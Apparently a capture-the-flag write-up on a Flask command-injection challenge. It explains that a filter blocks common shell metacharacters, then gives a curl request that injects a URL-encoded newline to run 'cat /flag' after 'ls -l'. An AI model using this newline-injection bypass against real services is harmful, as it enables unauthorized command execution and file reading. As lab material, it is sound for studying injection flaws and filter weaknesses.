cat /challenge/serverThe Flask app takes a path as query param (/exercise?subdirectory) and executes ls -l {subdirectory}
Problem: The special characters ; & | > < ( ) ` $ all are blocked \
We know that newline can also be used as a command separator.
Executing:
ls -l .
cat /flagStart the server and use curl:
curl http://challenge.localhost:80/exercise?subdirectory=.%0Acat%20/flag